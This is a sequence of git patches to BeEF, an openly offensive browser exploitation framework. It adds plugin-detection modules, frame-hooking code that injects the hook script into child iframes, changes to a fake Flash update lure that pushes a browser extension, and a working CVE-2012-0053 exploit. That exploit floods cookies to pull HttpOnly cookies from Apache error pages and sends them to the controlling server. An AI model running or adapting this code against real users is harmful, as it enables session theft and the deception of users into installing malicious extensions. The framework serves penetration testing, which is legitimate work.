diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 8423feec4..40aa2b879 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -29,6 +29,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_java           = zombie_array[index]["has_java"];
 		var has_activex        = zombie_array[index]["has_activex"];
 		var has_vlc            = zombie_array[index]["has_vlc"];
+        var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
@@ -45,12 +46,13 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-                balloon_text+= "<br/>Java: "           + has_java;
-                balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+        balloon_text+= "<br/>Java: "           + has_java;
+        balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
-                balloon_text+= "<br/>VLC: "            + has_vlc;
+        balloon_text+= "<br/>VLC: "            + has_vlc;
+        balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 2d57a286e..d228de9b6 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -300,6 +300,7 @@ class ShellInterface
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
         ['Browser Components', 'VLC',                'HasVLC'],
+        ['Browser Components', 'Foxit',              'HasFoxit'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
diff --git a/modules/browser/detect_foxit/command.js b/modules/browser/detect_foxit/command.js
new file mode 100644
index 000000000..937e4c2a2
--- /dev/null
+++ b/modules/browser/detect_foxit/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasFoxit() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result);
+
+});
+
diff --git a/modules/browser/detect_foxit/config.yaml b/modules/browser/detect_foxit/config.yaml
new file mode 100644
index 000000000..5455200e1
--- /dev/null
+++ b/modules/browser/detect_foxit/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_foxit:
+            enable: true
+            category: "Browser"
+            name: "Detect Foxit Reader"
+            description: "This module will check if the browser has Foxit Reader Plugin."
+            authors: ["javuto"]
+            target:
+                working: ["All"]
diff --git a/modules/browser/detect_foxit/module.rb b/modules/browser/detect_foxit/module.rb
new file mode 100644
index 000000000..22fd07577
--- /dev/null
+++ b/modules/browser/detect_foxit/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_foxit < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['foxit'] = @datastore['foxit']
+		save content
+	end
+
+end

From de1de356f75b0eba60203f7c6fa7090c912778c5 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 12 Mar 2013 10:57:07 +0000
Subject: [PATCH 232/397] Added GoogleWebStore module.rb option. Modified link
 opener to support data URI injections.

---
 .../social_engineering/fake_flash_update/command.js    | 10 ++++++----
 modules/social_engineering/fake_flash_update/module.rb |  2 +-
 2 files changed, 7 insertions(+), 5 deletions(-)

diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
index 5facbda3a..0cc853ad6 100644
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -10,13 +10,13 @@ beef.execute(function() {
   	var image = "<%== @image %>";
     var payload_type = "<%== @payload %>";
     var payload_root =  "<%== @payload_root %>";
-
-    var chrome_extension = "/demos/adobe_flash_update.crx";
+    var chrome_store_uri = "<%== @chrome_store_uri %>";
     var firefox_extension = "/api/ipec/ff_extension";
     var payload = "";
+
     switch (payload_type) {
         case "Chrome_Extension":
-            payload = payload_root + chrome_extension;
+            payload = chrome_store_uri;
             break;
         case "Firefox_Extension":
             payload = payload_root + firefox_extension;
@@ -32,7 +32,9 @@ beef.execute(function() {
 	div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
 	div.setAttribute('align', 'center');
 	document.body.appendChild(div);
-	div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\'  /></a>';
+	// window.open is very useful when using data URI vectors and the IFrame/Object tag
+	// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
+    div.innerHTML= "<a href=\"javascript:window.open('" + payload + "')\"><img src=\"" + image + "\" /></a>";
     $j("#splash").click(function () {
       $j(this).hide();
         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
index c1b4fd4b7..cbdfaf4ff 100644
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -13,11 +13,11 @@ class Fake_flash_update < BeEF::Core::Command
     return [
         {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
         {'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root},
+        {'name' =>'chrome_store_uri', 'description' =>'Chrome WebStore Extension URI', 'ui_label'=>'Chrome WebStore Extension URI', 'value' => ""},
         { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
           'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']],
           'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
         }
-
     ]
   end
   

From 8132eb0e538bdc3d2d61bf87a77e4d6b79ddf8bd Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 16 Mar 2013 20:12:27 +1030
Subject: [PATCH 233/397] Solution: Hide beef behind an apache webserver

Manually merge code from @lalaglubsch

Add support for BeEF through a proxy

Fix issue #856
---
 core/main/handlers/hookedbrowsers.rb | 13 ++++++++++---
 core/main/handlers/modules/beefjs.rb |  6 ++++++
 2 files changed, 16 insertions(+), 3 deletions(-)

diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb
index 1236decc2..91cb935f3 100644
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -55,9 +55,16 @@ module Handlers
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = request.ip
+        if config.get('beef.http.use_x_forward_for') == true
+          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hook
+            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
+          end
+        else
+          if hooked_browser.ip != request.ip
+           BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+           hooked_browser.ip = request.ip
+          end
         end
       
         hooked_browser.count!
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index f120f7814..1f434189a 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -66,6 +66,12 @@ module BeEF
             hook_session_config = BeEF::Core::Server.instance.to_h
 
             # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            unless hook_session_config['beef_public'].nil?
+              if hook_session_config['beef_host'] != hook_session_config['beef_public']
+                hook_session_config['beef_host'] = hook_session_config['beef_public']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
+              end
+            end
             if hook_session_config['beef_host'].eql? "0.0.0.0"
               hook_session_config['beef_host'] = req_host
               hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)

From f3f624e9a43aaff9bfbebbaa33899756c3169cd2 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 17 Mar 2013 03:21:38 +1030
Subject: [PATCH 234/397] Fixed bug introduced in commit
 8132eb0e538bdc3d2d61bf87a77e4d6b79ddf8bd

---
 core/main/handlers/hookedbrowsers.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb
index 91cb935f3..218be6d30 100644
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -57,7 +57,7 @@ module Handlers
         # @note Check for a change in zombie IP and log an event
         if config.get('beef.http.use_x_forward_for') == true
           if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
-            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hook
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
             hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
           end
         else

From c98d9a4300b5a526cfb099400741446778f97b8f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 17 Mar 2013 03:30:12 +1030
Subject: [PATCH 235/397] Manually merged Windows Media Player detection from
 @gcattani

Fix issue #833

Fix issue #847
---
 core/main/client/browser.js                   | 45 ++++++++++++++++++-
 core/main/handlers/browserdetails.rb          |  8 ++++
 .../admin_ui/controllers/modules/modules.rb   |  1 +
 .../admin_ui/controllers/panel/panel.rb       |  2 +
 .../media/javascript/ui/panel/ZombiesMgr.js   |  2 +
 extensions/console/lib/shellinterface.rb      |  1 +
 modules/browser/detect_wmp/command.js         | 13 ++++++
 modules/browser/detect_wmp/config.yaml        | 15 +++++++
 modules/browser/detect_wmp/module.rb          | 14 ++++++
 9 files changed, 100 insertions(+), 1 deletion(-)
 create mode 100644 modules/browser/detect_wmp/command.js
 create mode 100644 modules/browser/detect_wmp/config.yaml
 create mode 100644 modules/browser/detect_wmp/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 10daa9cf4..88926c088 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -964,6 +964,47 @@ beef.browser = {
 
     },
 
+	/**
+	 * Checks if the zombie has the Windows Media Player plugin installed.
+	 * @return: {Boolean} true or false.
+	 *
+	 * @example: if ( beef.browser.hasWMP() ) { ... }
+	 */
+	hasWMP:function () {
+
+	    var wmp = false;
+
+	    // Not Internet Explorer
+	    if (!this.type().IE) {
+
+	        for (i = 0; i < navigator.plugins.length; i++) {
+
+	            if (navigator.plugins[i].name.indexOf("Windows Media Player") >= 0) {
+	                wmp = true;
+	            }
+
+	        }
+
+	    // Internet Explorer
+	    } else {
+
+	        try {
+
+	            var wmp_test = new ActiveXObject('WMPlayer.OCX');
+
+	        } catch (e) {
+	        }
+
+	        if (wmp_test) {
+	            wmp = true;
+	        }
+
+	    }
+
+	    return wmp;
+
+	},
+
     /**
      *  Checks if VLC is installed
      *  @return: {Boolean} true or false
@@ -1401,6 +1442,7 @@ beef.browser = {
         var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
         var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
         var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
+        var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; 
         var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
         var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
         try{
@@ -1446,7 +1488,8 @@ beef.browser = {
         if (has_silverlight) details['HasSilverlight'] = has_silverlight;
         if (has_quicktime) details['HasQuickTime'] = has_quicktime;
         if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
-        if (has_vlc) details['HasVLC'] = has_vlc ;
+        if (has_wmp) details['HasWMP'] = has_wmp;
+        if (has_vlc) details['HasVLC'] = has_vlc;
         if (has_foxit) details['HasFoxit'] = has_foxit;
 
         return details;
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 7469a2edd..ae9218d65 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -287,6 +287,14 @@ module BeEF
             self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWMP
+          has_wmp = get_param(@data['results'], 'HasWMP')
+          if BeEF::Filters.is_valid_yes_no?(has_wmp)
+            BD.set(session_id, 'HasWMP', has_wmp)
+          else
+            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasVLC
           has_vlc = get_param(@data['results'], 'HasVLC')
           if BeEF::Filters.is_valid_yes_no?(has_vlc)
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 327499b3e..3d71bc7aa 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -83,6 +83,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'Windows Media Player','HasWMP'],
         ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'Foxit Reader',       'HasFoxit'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index bd06df3db..22eeb00b6 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -92,6 +92,7 @@ module BeEF
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
             has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
+            has_wmp         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP') 
             has_vlc         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
             has_foxit       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
@@ -115,6 +116,7 @@ module BeEF
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,
+                'has_wmp'         => has_wmp,
                 'has_vlc'         => has_vlc,
                 'has_foxit'       => has_foxit,
                 'has_realplayer'  => has_realplayer,
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 40aa2b879..d983ba4a9 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -28,6 +28,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
 		var has_java           = zombie_array[index]["has_java"];
 		var has_activex        = zombie_array[index]["has_activex"];
+        var has_wmp            = zombie_array[index]["has_wmp"]; 
 		var has_vlc            = zombie_array[index]["has_vlc"];
         var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
@@ -51,6 +52,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
+        balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
         balloon_text+= "<br/>VLC: "            + has_vlc;
         balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index d228de9b6..e122933e5 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -299,6 +299,7 @@ class ShellInterface
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'Windows Media Player','HasWMP'], 
         ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'Foxit',              'HasFoxit'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
diff --git a/modules/browser/detect_wmp/command.js b/modules/browser/detect_wmp/command.js
new file mode 100644
index 000000000..2d58463fe
--- /dev/null
+++ b/modules/browser/detect_wmp/command.js
@@ -0,0 +1,13 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasWMP() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "wmp="+result);
+
+});
diff --git a/modules/browser/detect_wmp/config.yaml b/modules/browser/detect_wmp/config.yaml
new file mode 100644
index 000000000..376c7cb26
--- /dev/null
+++ b/modules/browser/detect_wmp/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_wmp:
+            enable: true
+            category: "Browser"
+            name: "Detect Windows Media Player"
+            description: "This module will check if the browser has the Windows Media Player plugin installed."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/browser/detect_wmp/module.rb b/modules/browser/detect_wmp/module.rb
new file mode 100644
index 000000000..afa829b8a
--- /dev/null
+++ b/modules/browser/detect_wmp/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_wmp < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['wmp'] = @datastore['wmp']
+		save content
+	end
+
+end

From fb26ef5f71042d4be19ec92746cc7fff9e41a556 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 18 Mar 2013 00:37:15 +1030
Subject: [PATCH 236/397] Add `beef.browser.hookChildFrames()`

BeEF now automatically hooks all same-domain child (i)frames

Allows logging of child frame events - fixes issue #493
---
 core/main/client/browser.js  | 24 ++++++++++++++++++++++++
 core/main/client/logger.js   |  1 +
 extensions/events/handler.rb |  4 ++--
 3 files changed, 27 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 88926c088..860727cea 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -842,6 +842,30 @@ beef.browser = {
         return 'UNKNOWN';					// Unknown UA
     },
 
+    /**
+     * Hooks all child frames in the current window
+     * Restricted by same-origin policy
+     */
+    hookChildFrames:function () {
+
+        // create script object
+        var script  = document.createElement('script');
+        script.type = 'text/javascript';
+        script.src  = '<%== @beef_proto %>://<%== @beef_host %>:<%== @beef_port %><%== @hook_file %>';
+
+        // loop through child frames
+        for (var i=0;i<self.frames.length;i++) {
+            try {
+                // append hook script
+                self.frames[i].document.body.appendChild(script);
+                console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
+            } catch (e) {
+                // warn on cross-domain
+                console.log("Hooking frame failed");
+            }
+        }
+    },
+
     /**
      * Checks if the zombie has flash installed and enabled.
      * @return: {Boolean} true or false.
diff --git a/core/main/client/logger.js b/core/main/client/logger.js
index f22843632..5db1cc3d2 100644
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -50,6 +50,7 @@ beef.logger = {
 	 */
 	start: function() {
 
+		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();
diff --git a/extensions/events/handler.rb b/extensions/events/handler.rb
index 17fd2f201..130972364 100644
--- a/extensions/events/handler.rb
+++ b/extensions/events/handler.rb
@@ -52,7 +52,7 @@ module Events
         when 'click'
           result = "#{event['time']}s - [Mouse Click] x: #{event['x']} y:#{event['y']} > #{event['target']}"
         when 'focus'
-          result = "#{event['time']}s - [Focus] Browser has regained focus."
+          result = "#{event['time']}s - [Focus] Browser window has regained focus."
         when 'copy'
           result = "#{event['time']}s - [User Copied Text] \"#{event['data']}\""
         when 'cut'
@@ -60,7 +60,7 @@ module Events
         when 'paste'
           result = "#{event['time']}s - [User Pasted Text] \"#{event['data']}\""
         when 'blur'
-          result = "#{event['time']}s - [Blur] Browser has lost focus."
+          result = "#{event['time']}s - [Blur] Browser window has lost focus."
         when 'keys'
           result = "#{event['time']}s - [User Typed] \"#{event['data']}\" > #{event['target']}"
         when 'submit'

From 6abb21ac5341954dbd8fdb6e832ce47223142fe1 Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Tue, 19 Mar 2013 17:29:48 +0100
Subject: [PATCH 237/397] Module: Apache HTTP Server cookie disclosure
 (exploit)

---
 .gitignore                                    |  2 +
 .../apache_cookie_disclosure/command.js       | 75 +++++++++++++++++++
 .../apache_cookie_disclosure/config.yaml      | 15 ++++
 .../apache_cookie_disclosure/module.rb        | 14 ++++
 4 files changed, 106 insertions(+)
 create mode 100644 modules/exploits/apache_cookie_disclosure/command.js
 create mode 100644 modules/exploits/apache_cookie_disclosure/config.yaml
 create mode 100644 modules/exploits/apache_cookie_disclosure/module.rb

diff --git a/.gitignore b/.gitignore
index 7494b2b02..7dacad784 100644
--- a/.gitignore
+++ b/.gitignore
@@ -4,3 +4,5 @@ custom-config.yaml
 .DS_Store
 .gitignore
 .rvmrc
+
+*.lock
diff --git a/modules/exploits/apache_cookie_disclosure/command.js b/modules/exploits/apache_cookie_disclosure/command.js
new file mode 100644
index 000000000..b695e4838
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
+
+beef.execute(function() {
+
+	function setCookies (good) {
+
+		var str = "";
+		
+		for (var i=0; i< 819; i++) {
+			str += "z";
+		}
+		
+		for (i = 0; i < 10; i++) {
+			
+			if (good) {		// Expire evil cookie
+				var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;";
+			} else {		// Set evil cookie
+				var cookie = "beef" + i + "=" + str + "; path=/";
+			}
+		document.cookie = cookie;
+		}
+	}
+
+	function makeRequest() {
+		setCookies();
+
+		function parseCookies () {
+			var cookie_dict = {};
+			
+			// React on 400 status
+			if (xhr.readyState === 4 && xhr.status === 400) {
+				
+				// Replace newlines and match <pre> content
+				var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
+				
+				if (content.length) {
+					
+					// Remove "Cookie:" prefix
+					content = content[1].replace("Cookie: ", "");
+					
+					var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
+					
+					// Add cookies to object
+					for (var i=0; i<cookies.length; i++) {
+						var s_c = cookies[i].split('=',2);
+						cookie_dict[s_c[0]] = s_c[1];
+					}
+				}
+				
+				// Unset malicious cookies
+				setCookies(true);
+	
+				var result = JSON.stringify(cookie_dict);
+	
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies="+result);
+	
+			}
+		}
+		
+		// Make XHR request
+		var xhr = new XMLHttpRequest();
+		xhr.onreadystatechange = parseCookies;
+		xhr.open("GET", "/", true);
+		xhr.send(null);
+	}
+
+	makeRequest();
+
+});
\ No newline at end of file
diff --git a/modules/exploits/apache_cookie_disclosure/config.yaml b/modules/exploits/apache_cookie_disclosure/config.yaml
new file mode 100644
index 000000000..e8f0fcf47
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_cookies:
+            enable: true
+            category: "Exploits"
+            name: "Apache Cookie Disclosure"
+            description: "This module exploits CVE-2012-0053 in order to read the victim's cookies, even if issued with the HttpOnly attribute. The exploit only works if the target server is running Apache HTTP Server 2.2.0 through 2.2.21."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/exploits/apache_cookie_disclosure/module.rb b/modules/exploits/apache_cookie_disclosure/module.rb
new file mode 100644
index 000000000..22115ed86
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_cookies < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['apache_cookies'] = @datastore['apache_cookies']
+		save content
+	end
+
+end

From dc4665e1d3aeb01370d019a2b3627642d0f3d12d Mon Sep 17 00:00:00 2001
From: BWZ <ben@delonge.com.au>
Date: Mon, 25 Mar 2013 11:21:00 +1000
Subject: [PATCH 238/397] LiveCD - Updated URI + Version + MD5

---
 liveCD/BeEFLive.sh | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index 2bdc4941f..f5c4c685e 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -9,8 +9,8 @@
 #
 # This is the auto startup script for the BeEF Live CD. 
 # IT SHOULD ONLY BE RUN ON THE LIVE CD
-# Download LiveCD here: http://beefproject.com/BeEFLive1.2.iso
-# MD5 (BeEFLive1.2.iso) = 1bfba0942a3270ee977ceaeae5a6efd2
+# Download LiveCD here: http://downloads.beefproject.com/BeEFLive1.4.iso
+# MD5 (BeEFLive1.4.iso) = 5167450078ef5e9b8d146113cd4ba67c
 #
 # This script contains a few fixes to make BeEF play nicely with the way  
 # remastersys creates the live cd distributable as well as generating host keys 

From 39bc121b76e81b0bb56779cc4ed64c0c50eee3e7 Mon Sep 17 00:00:00 2001
From: BWZ <ben@delonge.com.au>
Date: Mon, 25 Mar 2013 11:29:02 +1000
Subject: [PATCH 239/397] LiveCD - Added IP Address to GUI when ssh enabled

---
 liveCD/BeEFLive.sh | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index f5c4c685e..49171de03 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -117,6 +117,8 @@ show_menu() {
 		f1="/etc/ssh/ssh_host_rsa_key"
 		if [ -f $f1 ] ; then
 			echo "[1] Disable SSH                              [Currently Enabled]"
+			echo -ne "                                             beef@"
+			ifconfig | awk -F "[: ]+" '/inet addr:/ { if ($4 != "127.0.0.1") print $4 }'
 		else 
 			echo "[1] Enable SSH                               [Currently Disabled]"
 		fi

From c0f0735150414cab8b573902f8cb1e8452cf3fba Mon Sep 17 00:00:00 2001
From: BWZ <ben@delonge.com.au>
Date: Mon, 25 Mar 2013 12:08:25 +1000
Subject: [PATCH 240/397] LiveCD config files and splash logo

---
 liveCD/isolinux.txt |  34 ++++++++++++++++++++++++++++++++++
 liveCD/splash.png   | Bin 0 -> 37807 bytes
 2 files changed, 34 insertions(+)
 create mode 100644 liveCD/isolinux.txt
